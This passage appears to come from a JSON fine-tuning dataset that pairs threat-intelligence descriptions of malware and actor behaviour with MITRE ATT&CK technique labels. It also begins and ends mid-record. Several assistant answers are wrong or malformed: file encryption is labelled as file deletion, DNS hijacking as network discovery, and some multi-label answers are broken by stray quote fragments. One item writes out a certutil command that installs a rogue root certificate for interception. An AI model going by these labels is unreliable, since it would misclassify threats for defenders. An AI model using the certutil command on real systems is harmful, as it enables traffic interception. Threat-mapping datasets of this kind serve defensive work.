- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SeaDuke is capable of persisting via a .lnk file stored in the Startup directory."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TAINTEDSCRIBE can enable Windows CLI access and execute files."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "attempts to disable UAC remote restrictions by modifying the Registry."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates Registry entries that store information about a created service and point to a malicious DLL dropped to disk."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Unpacking routine for SWF exploit The exploit is a memory corruption vulnerability that exists in the “com.adobe.tvsdk.mediacore.BufferControlParameters” class. If the exploit is successful, it will gain arbitrary read / write operations within memory, thus allowing it to execute a second stage shellcode"
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation', 'T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has used a script that checks `/proc/*/environ` for environment variables related to AWS."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In past attacks, the Ragnar Locker group has used exploits of managed service providers or attacks on Windows Remote Desktop Protocol (RDP) connections to gain a foothold on targeted networks"
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution', 'T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Filter the target machines: setup.bat first checks if the hostname of the machine is one of the following: PIS-APP, PIS-MOB, WSUSPROXY or PIS-DB. If so, it stops the execution and deletes the folder containing the malicious script from this machine. The use of specific hostnames and internal paths indicates the attacker had prior knowledge of the environment. Extract and run additional tools: update.bat, which was extracted and started by setup.bat, uses the password hackemall to extract the next stages: cache.bat, msrun.bat and bcd.bat. Corrupt the boot: bcd.bat is used in order to harm the boot process. It moves wiper-related files to “C:\\temp” and creates a scheduled task named mstask to execute the wiper only once at 23:55:00"
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxShell can launch a reverse command shell."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Winnti for Linux can encode its configuration file with single-byte XOR encoding."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can user PowerView to perform “net user” commands and create local system and domain accounts."
- },
- {
- "role": "assistant",
- "content": "T1136 - Create Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MiniDuke can create a process on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1543 - Create or Modify System Process"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AuTo Stealer has the ability to collect information about installed AV products from an infected host."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FinFisher creates a new Windows service with the malicious executable for persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Summary In early May, Unit 42 discovered an attack campaign against at least one defense company in Russia and one unidentified organization in South Korea delivering a variant of Bisonal malware. While not previously publicly documented, the variant has been in the wild since at least 2014. There are three primary differences between it and older Bisonal malware including a different cipher and encryption for C2 communication, and a large rewrite of the code for both network communication and maintaining persistence. The adversary behind these attacks lured the targets into launching the Microsoft Windows executable malware by masquerading it as a PDF file (using a fake PDF icon) and reusing publicly available data for the decoy PDF file’s contents. Attacks using Bisonal have been blogged about in the past. We believe it is likely these tools are being used by one group of attackers. Though Bisonal malware has been in the wild for at least seven years and frequently updated, the actors keep using same high-level playbooks. Common features of attacks involving Bisonal include"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group malware has used \"CreateProcess\" to launch additional malicious components."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malicious script executed by the Microsoft Publisher file downloads and runs yet another JavaScript file, 0.js, hosted on the attacker-controlled server"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire is capable of capturing screenshots on Windows and macOS systems."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SombRAT has uploaded collected data and files from a compromised host to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WindTail has the ability to generate the current date and time."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In recent BitPaymer IR engagements, Falcon Intelligence linked the initial infection vector to fake updates for a FlashPlayer plugin and the Chrome web browser. These fake updates are served via legitimate websites that have been compromised, and use social engineering to trick users into downloading and running a malicious executable. These fake update campaigns appear to be a pay-per-install service that is simply used by INDRIK SPIDER to deliver its malware, as other malware has also been delivered via the same campaigns"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1584.004 - Server"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 deployed a Monero cryptocurrency mining tool in a victim’s environment."
- },
- {
- "role": "assistant",
- "content": "T1496 - Resource Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE can copy itself to and launch itself from hidden folders."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "certutil can be used to install browser root certificates as a precursor to performing Adversary-in-the-Middle between connections to banking websites. Example command: \"certutil -addstore -f -user ROOT ProgramData\\cert512121.der\"."
- },
- {
- "role": "assistant",
- "content": "T1553.004 - Subvert Trust Controls: Install Root Certificate"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Frankenstein has used PowerShell to run a series of base64-encoded commands, that acted as a stager and enumerated hosts."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PHOREAL is capable of manipulating the Registry."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Exaramel for Linux has a hardcoded location that it uses to achieve persistence if the startup system is Upstart or System V and it is running as root."
- },
- {
- "role": "assistant",
- "content": "T1543 - Create or Modify System Process"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pteranodon can use HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "cmd can be used to find information about the operating system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "abuses NTFS transactions to launch and conceal malicious processes."
- },
- {
- "role": "assistant",
- "content": "T1055.013 - Process Doppelgänging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent Tesla has exploited Office vulnerabilities such as CVE-2017-11882 and CVE-2017-8570 for execution during delivery."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During C0015, the threat actors used `wmic` and `rundll32` to load Cobalt Strike onto a target host."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors discovered the local network configuration with `ipconfig`."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN10 has used batch scripts and scheduled tasks to delete critical system files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This shellcode is decrypted in memory through EQENDT32.EXE"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerLess can use a .NET browser information stealer module."
- },
- {
- "role": "assistant",
- "content": "T1217 - Browser Bookmark Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The configuration, along with downloaded plugins and all harvested data are stored in a custom database format inside a single file under the %TEMP% directory. The file name is hardcoded and obfuscated with XOR. The storage file is encrypted with AES-256 using a hardcoded key and is decrypted each time the malware needs to read or write it and re-encrypted after new data is added"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After the C2 information has been collected, BADNEWS leverages HTTP for communication with the remote servers"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Meteor can fill a victim's files and directories with zero-bytes in replacement of real content before deleting them."
- },
- {
- "role": "assistant",
- "content": "T1485 - Data Destruction"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "xCaon has uploaded files from victims' machines."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 actors have compressed data from remote systems and moved it to another staging system before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1074.002 - Remote Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNBURST added junk bytes to its C2 over HTTP."
- },
- {
- "role": "assistant",
- "content": "T1001.001 - Junk Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the final stage of its attacks, the TeleBots group always used the KillDisk malware to overwrite files with specific file extensions on the victims’ disks. The KillDisk malware used in the first wave of December 2016 attacks, instead of encrypting, simply overwrites targeted files"
- },
- {
- "role": "assistant",
- "content": "T1485 - Data Destruction"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HEXANE has used `net view` to enumerate domain machines."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clambling has gained execution through luring victims into opening malicious files."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RainyDay can use scheduled tasks to achieve persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "That executes the perl script, puts it to sleep for two seconds and deletes the file to remove any evidence"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "dumps memory from specific processes on a victim system, parses the dumped files, and scrapes them for credit card data."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of downloading additional files through C2 channels, including a new version of itself."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HttpBrowser is a remote access tool whose name originates from the hard-coded \"HttpBrowser/1.0\" User-Agent. Table 2 lists the commands available to threat actors in one of the HttpBrowser variants"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbanak campaigns can also use legitimate programs and remote access software for command and control. They also employ standard non-application layer protocols for communication."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POSHSPY modifies timestamps of all downloaded executables to match a randomly selected file created prior to 2013."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAFNIUM has created and granted privileges to domain accounts."
- },
- {
- "role": "assistant",
- "content": "T1136.002 - Create Account: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BONDUPDATER waits to receive an instruction from the C2 server that starts with “E” before writing the downloaded data to the supplied filename. After receiving the “E” instruction, the Trojan will write the base64 decoded data to the file and process the newly created file. Figure 27 shows the C2 server providing the “E” instruction within the TXT answer. In the current example, the Trojan would treat the newly saved file as a script thanks to the filename ending with the “0” character. The Trojan would run the contents of the file using “cmd.exe” and save the output to a file named “proc10100” that will be uploaded to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ursnif has gathered information about running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT37 has collected data from victims' local systems."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pay2Key has used RSA encrypted communications with C2."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses the Dropbox cloud storage service for command and control."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNSPOT used Windows API functions such as \"MoveFileEx\" and \"NtQueryInformationProcess\" as part of the SUNBURST injection process."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GALLIUM ensured each payload had a unique hash, including by using different types of packers."
- },
- {
- "role": "assistant",
- "content": "T1027.005 - Indicator Removal from Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "P.A.S. Webshell can delete scripts from a subdirectory of /tmp after they are run."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A series of xor 0x28 loops decrypt the contents of a self-deletion batch file, which is then written to disk and executed. Later in the execution, a more complex rc4 loop decrypts the download url and other strings and imports"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RDAT has used encoded data within subdomains as AES ciphertext to communicate from the host to the C2."
- },
- {
- "role": "assistant",
- "content": "T1001 - Data Obfuscation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Konni malware family use a custom base64 key to encode the content of several files in the exfiltration phase. We observed the same flow of data reconnaissance and exfiltration across all campaigns"
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can identify the installed antivirus product on a targeted system."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Instructions within guide.txt explaining how to carry out DNS hijacking attack In one part of guide.txt, an example target appears to be provided, with a corresponding adversary IP (185.162.235[.]106) for the legitimate domain to be redirected to"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The last one is used by this setup, and in this mode the ransomware encrypts the files on all available mapped network drives"
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact', 'T1564.006 - Run Virtual Instance"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Backdoor.Oldrea collects information about running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 has used the Stealer One credential stealer to target e-mail and file transfer utilities including FTP."
- },
- {
- "role": "assistant",
- "content": "T1555 - Credentials from Password Stores"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actors used Windows’ scheduled task and batch scripts to execute “scr.exe” and collect additional information from hosts on the network. The tool “scr.exe” is a screenshot utility that the threat actor used to capture the screen of systems across the network. The MD5 hash of “scr.exe” matched the MD5 of ScreenUtil, as reported in the Symantec Dragonfly 2.0 report"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PcShare has deleted its files and components from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The goal of targeting some victims appears to be to obtain data. How this data is obtained likely differs per victim, but we observed the usage of several custom DLL files used to continuously retrieve data from memory of systems where such data is typically processed"
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo requires the user to double-click the executable to run the malicious HTA file or to download a malicious installer."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
